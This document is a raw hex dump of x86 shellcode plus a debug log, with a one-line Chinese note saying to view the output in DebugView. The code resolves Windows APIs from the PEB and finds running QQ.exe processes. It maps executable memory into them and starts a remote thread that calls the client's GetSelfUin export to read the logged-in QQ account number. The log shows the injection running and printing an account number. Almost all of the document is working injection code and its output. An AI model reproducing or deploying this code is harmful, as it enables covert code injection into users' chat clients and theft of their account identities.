72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72 65 61 64 2C 49
4E 46 49 4E 49 54 45 29 00 FF 55 00 61 6A FF FF B5 6C FE FF FF FF 55 E0 60 E8 3C 00 00 00 4D 79
49 41 54 3A 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 09 09 09 28 68 52 65 6D 6F 74 65
54 68 72 65 61 64 2C 61 64 64 72 20 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 8D 85
68 FE FF FF 50 FF B5 6C FE FF FF FF 55 E4 56 8B F4 60 E8 3D 00 00 00 4D 79 49 41 54 3A 77 73 70
72 69 6E 74 66 41 09 09 09 28 61 64 64 72 20 40 51 51 55 69 64 2C 22 BB F1 C8 A1 B5 BD 51 51 BA
C5 3A 25 64 22 2C 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 FF B5 68 FE FF FF E8 0E
00 00 00 BB F1 C8 A1 B5 BD 51 51 BA C5 3A 25 64 00 8D 85 58 FE FF FF 50 FF 55 FC 60 E8 29 00 00
00 4D 79 49 41 54 3A 4F 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6E 67 41 09 09 09 28 61 64 64
72 20 40 51 51 55 69 64 29 00 FF 55 00 61 8D 85 58 FE FF FF 50 FF 55 F4 8B E6 5E 60 E8 24 00 00
00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72
65 61 64 29 00 FF 55 00 61 FF B5 6C FE FF FF FF 55 D0 60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C
6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63 65 73 73 31 29 00 FF 55 00 61 FF B5 88 FE
FF FF FF 55 D0 60 E8 29 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65 73 73 33 32 4E 65 78 74 09 09
09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF 55 00 61 8D 85 90 FE FF FF 50 FF
B5 8C FE FF FF FF 55 CC 0B C0 0F 85 23 FC FF FF 60 E8 1D 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73
65 48 61 6E 64 6C 65 09 09 09 28 68 61 6E 64 6C 65 29 00 FF 55 00 61 FF B5 8C FE FF FF FF 55 D0
60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63
65 73 73 32 29 00 FF 55 00 61 FF B5 84 FE FF FF FF 55 D0 61 C9 C3
8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44
10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B
3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4
08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C
6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C
65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75 74 44 65 62 75 67
53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00 00 44 65 62 75 67
20 6D 6F 64 65 21 00 FF 54 24 14 E8 0A 00 00 00 4B 65 72 6E 65 6C 33 32 00 02 5E E8 20 00 00 00
47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00
5F B9 01 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68 8B D8
56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24 08 89
44 8D F8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66 61 69
6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01 59 49
0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61 6D 65
3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C 24 08
B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 60 E8 30 00 00 00 69 6E 6A 65 63 74 49 41
54 3A 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 09 09 09 28 22 4B 65 72 6E 65 6C 55 74 69
6C 2E 64 6C 6C 22 29 00 FF 55 00 61 E8 0F 00 00 00 4B 65 72 6E 65 6C 55 74 69 6C 2E 64 6C 6C 00
FF 55 F8 0B C0 74 7E 60 E8 43 00 00 00 69 6E 6A 65 63 74 49 41 54 3A 47 65 74 50 72 6F 63 41 64
64 72 65 73 73 09 09 09 28 65 61 78 2C 22 3F 47 65 74 53 65 6C 66 55 69 6E 40 43 6F 6E 74 61 63
74 40 55 74 69 6C 40 40 59 41 4B 58 5A 22 29 00 FF 55 00 61 E8 20 00 00 00 3F 47 65 74 53 65 6C
66 55 69 6E 40 43 6F 6E 74 61 63 74 40 55 74 69 6C 40 40 59 41 4B 58 5A 00 50 FF 55 FC 0B C0 74
04 FF D0 C9 C3 33 C0 55 8B EC 81 C4 58 FE FF FF 60 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40
D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B
D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65
73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48
18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04
E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65
74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75
74 44 65 62 75 67 53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00
00 44 65 62 75 67 20 6D 6F 64 65 21 00 FF 54 24 14 E8 23 00 00 00 4B 65 72 6E 65 6C 33 32 00 0E
4B 65 72 6E 65 6C 33 32 00 02 6E 74 64 6C 6C 00 01 75 73 65 72 33 32 00 01 5E E8 23 01 00 00 47
65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 50
72 6F 63 65 73 73 33 32 46 69 72 73 74 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E
61 70 73 68 6F 74 00 6C 73 74 72 63 6D 70 69 41 00 50 72 6F 63 65 73 73 33 32 4E 65 78 74 00 43
6C 6F 73 65 48 61 6E 64 6C 65 00 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 00 4F 70
65 6E 50 72 6F 63 65 73 73 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 61 69 74 46 6F 72 53 69
6E 67 6C 65 4F 62 6A 65 63 74 00 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 00 43 72 65
61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73
73 49 64 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 4F 75 74 70 75 74 44 65 62 75 67 53 74 72
69 6E 67 41 00 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 77 73 70 72 69 6E 74 66
41 00 5F B9 04 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68
8B D8 56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24
08 89 44 8D B8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66
61 69 6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01
59 49 0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61
6D 65 3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C
24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 C7 85 74 FE FF FF 00 10 00 00 60 E8
5C 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 09 09 09 28
49 4E 56 41 4C 49 44 5F 48 41 4E 44 4C 45 5F 56 41 4C 55 45 2C 4E 55 4C 4C 2C 50 41 47 45 5F 45
58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 2C 30 2C 31 30 32 34 2A 34 2C 4E 55 4C 4C 29 00
FF 55 00 61 6A 00 68 00 10 00 00 6A 00 6A 40 6A 00 6A FF FF 55 E8 89 85 80 FE FF FF 60 E8 1F 00
00 00 4D 79 49 41 54 3A 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 49 64 09 09 09 28 29
00 FF 55 00 61 FF 55 EC 60 E8 33 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63 65 73 73 09
09 09 28 50 52 4F 43 45 53 53 5F 41 4C 4C 5F 41 43 43 45 53 53 2C 46 41 4C 53 45 2C 65 61 78 29
00 FF 55 00 61 50 6A 00 68 FF 0F 1F 00 FF 55 D8 89 85 84 FE FF FF 83 A5 78 FE FF FF 00 60 E8 71
00 00 00 4D 79 49 41 54 3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68
4D 61 70 70 65 64 46 69 6C 65 2C 68 50 72 6F 63 65 73 73 32 2C 61 64 64 72 20 56 69 65 77 42 61
73 65 32 2C 30 2C 30 2C 30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45
5F 45 58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85
74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 78 FE FF FF 50 FF B5 84 FE FF FF FF B5 80 FE FF FF FF 55
F8 83 F8 00 0F 82 16 05 00 00 E8 00 00 00 00 81 2C 24 CF 17 40 00 58 8D 80 05 10 40 00 89 85 70
FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 09 09 09 28
56 69 65 77 42 61 73 65 32 2C 72 61 64 72 2C 69 6E 6A 65 63 74 43 6F 64 65 6C 65 6E 29 00 FF 55
00 61 68 E2 02 00 00 FF B5 70 FE FF FF FF B5 78 FE FF FF FF 55 F0 60 E8 38 00 00 00 4D 79 49 41
54 3A 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 09 09 09 28 54 48
33 32 43 53 5F 53 4E 41 50 50 52 4F 43 45 53 53 2C 30 29 00 FF 55 00 61 6A 00 6A 02 FF 55 C4 89
85 8C FE FF FF C7 85 90 FE FF FF 28 01 00 00 60 E8 2A 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65
73 73 33 32 46 69 72 73 74 09 09 09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF
55 00 61 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 C0 60 E8 31 00 00 00 4D 79 49 41 54 3A 6C
73 74 72 63 6D 70 69 41 09 09 09 28 61 64 64 72 20 69 6E 66 6F 2E 73 7A 45 78 65 46 69 6C 65 2C
22 51 51 2E 65 78 65 22 29 00 FF 55 00 61 E8 07 00 00 00 51 51 2E 65 78 65 00 8D 85 B4 FE FF FF
50 FF 55 C8 0B C0 0F 85 39 03 00 00 60 E8 30 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63
65 73 73 09 09 09 28 34 30 39 35 2C 30 2C 69 6E 66 6F 2E 74 68 33 32 50 72 6F 63 65 73 73 49 44
29 00 FF 55 00 61 FF B5 98 FE FF FF 6A 00 68 FF 0F 00 00 FF 55 D8 0B C0 0F 84 E7 02 00 00 89 85
88 FE FF FF 83 A5 7C FE FF FF 00 C7 85 74 FE FF FF 00 10 00 00 60 E8 71 00 00 00 4D 79 49 41 54
3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68 4D 61 70 70 65 64 46 69
6C 65 2C 68 50 72 6F 63 65 73 73 31 2C 61 64 64 72 20 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45 5F 45 58 45 43 55 54 45
5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A
00 6A 00 8D 85 7C FE FF FF 50 FF B5 88 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 0F 82 F0 01
00 00 60 E8 3B 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64
09 09 09 28 68 50 72 6F 63 65 73 73 31 2C 30 2C 30 2C 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 29 00 FF 55 00 61 6A 00 6A 00 6A 00 FF B5 7C FE FF FF 6A 00 6A 00 FF B5 88 FE FF FF FF 55 D4
0B C0 0F 84 8A 01 00 00 89 85 6C FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 57 61 69 74 46 6F
72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72 65 61 64 2C 49
4E 46 49 4E 49 54 45 29 00 FF 55 00 61 6A FF FF B5 6C FE FF FF FF 55 E0 60 E8 3C 00 00 00 4D 79
49 41 54 3A 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 09 09 09 28 68 52 65 6D 6F 74 65
54 68 72 65 61 64 2C 61 64 64 72 20 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 8D 85
68 FE FF FF 50 FF B5 6C FE FF FF FF 55 E4 56 8B F4 60 E8 3D 00 00 00 4D 79 49 41 54 3A 77 73 70
72 69 6E 74 66 41 09 09 09 28 61 64 64 72 20 40 51 51 55 69 64 2C 22 BB F1 C8 A1 B5 BD 51 51 BA
C5 3A 25 64 22 2C 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 FF B5 68 FE FF FF E8 0E
00 00 00 BB F1 C8 A1 B5 BD 51 51 BA C5 3A 25 64 00 8D 85 58 FE FF FF 50 FF 55 FC 60 E8 29 00 00
00 4D 79 49 41 54 3A 4F 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6E 67 41 09 09 09 28 61 64 64
72 20 40 51 51 55 69 64 29 00 FF 55 00 61 8D 85 58 FE FF FF 50 FF 55 F4 8B E6 5E 60 E8 24 00 00
00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72
65 61 64 29 00 FF 55 00 61 FF B5 6C FE FF FF FF 55 D0 60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C
6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63 65 73 73 31 29 00 FF 55 00 61 FF B5 88 FE
FF FF FF 55 D0 60 E8 29 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65 73 73 33 32 4E 65 78 74 09 09
09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF 55 00 61 8D 85 90 FE FF FF 50 FF
B5 8C FE FF FF FF 55 CC 0B C0 0F 85 23 FC FF FF 60 E8 1D 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73
65 48 61 6E 64 6C 65 09 09 09 28 68 61 6E 64 6C 65 29 00 FF 55 00 61 FF B5 8C FE FF FF FF 55 D0
60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63
65 73 73 32 29 00 FF 55 00 61 FF B5 84 FE FF FF FF 55 D0 61 C9 C3
调试输出信息,请用debugview查看:
00000004 10.53667545 [5112] Debug mode!
00000005 10.53904152 [5112] MyIAT:CreateFileMappingA (INVALID_HANDLE_VALUE,NULL,PAGE_EXECUTE_READWRITE,0,1024*4,NULL)
00000006 10.53908825 [5112] MyIAT:GetCurrentProcessId ()
00000007 10.53913784 [5112] MyIAT:OpenProcess (PROCESS_ALL_ACCESS,FALSE,eax)
00000008 10.53917313 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000009 10.53923798 [5112] MyIAT:RtlMoveMemory (ViewBase2,radr,injectCodelen)
00000010 10.53926563 [5112] MyIAT:CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS,0)
00000011 10.54169750 [5112] MyIAT:Process32First (handle,addr info)
00000012 10.54172421 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000013 10.54194260 [5112] MyIAT:Process32Next (handle,addr info)
00000014 10.54199123 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000015 10.54202461 [5112] MyIAT:Process32Next (handle,addr info)
00000016 10.54206276 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000017 10.54209423 [5112] MyIAT:Process32Next (handle,addr info)
00000018 10.54213047 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000019 10.54216290 [5112] MyIAT:Process32Next (handle,addr info)
00000020 10.54220104 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000021 10.54223156 [5112] MyIAT:Process32Next (handle,addr info)
00000022 10.54226780 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000023 10.54229736 [5112] MyIAT:Process32Next (handle,addr info)
00000024 10.54233360 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000025 10.54236412 [5112] MyIAT:Process32Next (handle,addr info)
00000026 10.54240036 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000027 10.54243088 [5112] MyIAT:Process32Next (handle,addr info)
00000028 10.54246712 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000029 10.54249859 [5112] MyIAT:Process32Next (handle,addr info)
00000030 10.54253387 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000031 10.54256439 [5112] MyIAT:Process32Next (handle,addr info)
00000032 10.54260063 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000033 10.54263020 [5112] MyIAT:Process32Next (handle,addr info)
00000034 10.54266548 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000035 10.54269600 [5112] MyIAT:Process32Next (handle,addr info)
00000036 10.54273129 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000037 10.54276276 [5112] MyIAT:Process32Next (handle,addr info)
00000038 10.54279709 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000039 10.54282856 [5112] MyIAT:Process32Next (handle,addr info)
00000040 10.54286480 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000041 10.54293251 [5112] MyIAT:Process32Next (handle,addr info)
00000042 10.54296970 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000043 10.54300022 [5112] MyIAT:Process32Next (handle,addr info)
00000044 10.54304123 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000045 10.54307461 [5112] MyIAT:Process32Next (handle,addr info)
00000046 10.54310989 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000047 10.54313946 [5112] MyIAT:Process32Next (handle,addr info)
00000048 10.54317570 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000049 10.54320717 [5112] MyIAT:Process32Next (handle,addr info)
00000050 10.54324436 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000051 10.54327393 [5112] MyIAT:Process32Next (handle,addr info)
00000052 10.54330921 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000053 10.54333973 [5112] MyIAT:Process32Next (handle,addr info)
00000054 10.54337502 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000055 10.54340553 [5112] MyIAT:Process32Next (handle,addr info)
00000056 10.54344177 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000057 10.54347229 [5112] MyIAT:Process32Next (handle,addr info)
00000058 10.54350662 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000059 10.54353809 [5112] MyIAT:Process32Next (handle,addr info)
00000060 10.54357433 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000061 10.54360485 [5112] MyIAT:Process32Next (handle,addr info)
00000062 10.54364014 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000063 10.54367065 [5112] MyIAT:Process32Next (handle,addr info)
00000064 10.54370689 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000065 10.54373550 [5112] MyIAT:Process32Next (handle,addr info)
00000066 10.54377079 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000067 10.54380226 [5112] MyIAT:Process32Next (handle,addr info)
00000068 10.54383755 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000069 10.54386806 [5112] MyIAT:Process32Next (handle,addr info)
00000070 10.54390335 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000071 10.54393291 [5112] MyIAT:Process32Next (handle,addr info)
00000072 10.54396820 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000073 10.54399872 [5112] MyIAT:Process32Next (handle,addr info)
00000074 10.54427528 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000075 10.54431629 [5112] MyIAT:Process32Next (handle,addr info)
00000076 10.54435539 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000077 10.54438496 [5112] MyIAT:Process32Next (handle,addr info)
00000078 10.54442024 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000079 10.54445171 [5112] MyIAT:Process32Next (handle,addr info)
00000080 10.54448795 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000081 10.54451752 [5112] MyIAT:Process32Next (handle,addr info)
00000082 10.54455280 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000083 10.54458332 [5112] MyIAT:Process32Next (handle,addr info)
00000084 10.54461861 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000085 10.54464912 [5112] MyIAT:Process32Next (handle,addr info)
00000086 10.54468441 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000087 10.54471493 [5112] MyIAT:Process32Next (handle,addr info)
00000088 10.54475021 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000089 10.54477978 [5112] MyIAT:Process32Next (handle,addr info)
00000090 10.54481506 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000091 10.54484558 [5112] MyIAT:Process32Next (handle,addr info)
00000092 10.54488277 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000093 10.54491138 [5112] MyIAT:Process32Next (handle,addr info)
00000094 10.54494762 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000095 10.54497719 [5112] MyIAT:Process32Next (handle,addr info)
00000096 10.54501247 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000097 10.54504395 [5112] MyIAT:Process32Next (handle,addr info)
00000098 10.54507923 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000099 10.54510880 [5112] MyIAT:Process32Next (handle,addr info)
00000100 10.54514408 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000101 10.54517365 [5112] MyIAT:Process32Next (handle,addr info)
00000102 10.54521084 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000103 10.54524136 [5112] MyIAT:Process32Next (handle,addr info)
00000104 10.54527664 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000105 10.54530716 [5112] MyIAT:Process32Next (handle,addr info)
00000106 10.54534245 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000107 10.54537201 [5112] MyIAT:Process32Next (handle,addr info)
00000108 10.54540825 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000109 10.54543972 [5112] MyIAT:Process32Next (handle,addr info)
00000110 10.54547501 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000111 10.54550457 [5112] MyIAT:Process32Next (handle,addr info)
00000112 10.54554081 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000113 10.54557037 [5112] MyIAT:Process32Next (handle,addr info)
00000114 10.54560471 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000115 10.54563618 [5112] MyIAT:Process32Next (handle,addr info)
00000116 10.54567146 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000117 10.54570198 [5112] MyIAT:Process32Next (handle,addr info)
00000118 10.54573727 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000119 10.54576683 [5112] MyIAT:Process32Next (handle,addr info)
00000120 10.54580212 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000121 10.54583263 [5112] MyIAT:Process32Next (handle,addr info)
00000122 10.54586792 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000123 10.54589844 [5112] MyIAT:Process32Next (handle,addr info)
00000124 10.54593468 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000125 10.54596519 [5112] MyIAT:Process32Next (handle,addr info)
00000126 10.54600143 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000127 10.54603195 [5112] MyIAT:Process32Next (handle,addr info)
00000128 10.54607105 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000129 10.54610252 [5112] MyIAT:Process32Next (handle,addr info)
00000130 10.54613876 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000131 10.54617119 [5112] MyIAT:OpenProcess (4095,0,info.th32ProcessID)
00000132 10.54664135 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000133 10.54668427 [5112] MyIAT:CreateRemoteThread (hProcess1,0,0,ViewBase1,0,0,0)
00000134 10.54684258 [5112] MyIAT:WaitForSingleObject (hRemoteThread,INFINITE)
00000135 10.54902363 [5216] Debug mode!
00000136 10.54912949 [5216] injectIAT:GetModuleHandleA ("KernelUtil.dll")
00000137 10.54917145 [5216] injectIAT:GetProcAddress (eax,"?GetSelfUin@Contact@Util@@YAKXZ")
00000138 10.54944611 [5112] MyIAT:GetExitCodeThread (hRemoteThread,addr Return_Value)
00000139 10.54951668 [5112] MyIAT:wsprintfA (addr @QQUid,"获取到QQ号:%d",Return_Value)
00000140 10.54955769 [5112] MyIAT:OutputDebugStringA (addr @QQUid)
00000141 10.54959297 [5112] 获取到QQ号:1067968022
00000142 10.54962349 [5112] MyIAT:CloseHandle (hRemoteThread)
00000143 10.54966354 [5112] MyIAT:CloseHandle (hProcess1)
00000144 10.54969597 [5112] MyIAT:Process32Next (handle,addr info)
00000145 10.54974365 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000146 10.54979992 [5112] MyIAT:OpenProcess (4095,0,info.th32ProcessID)
00000147 10.54984188 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
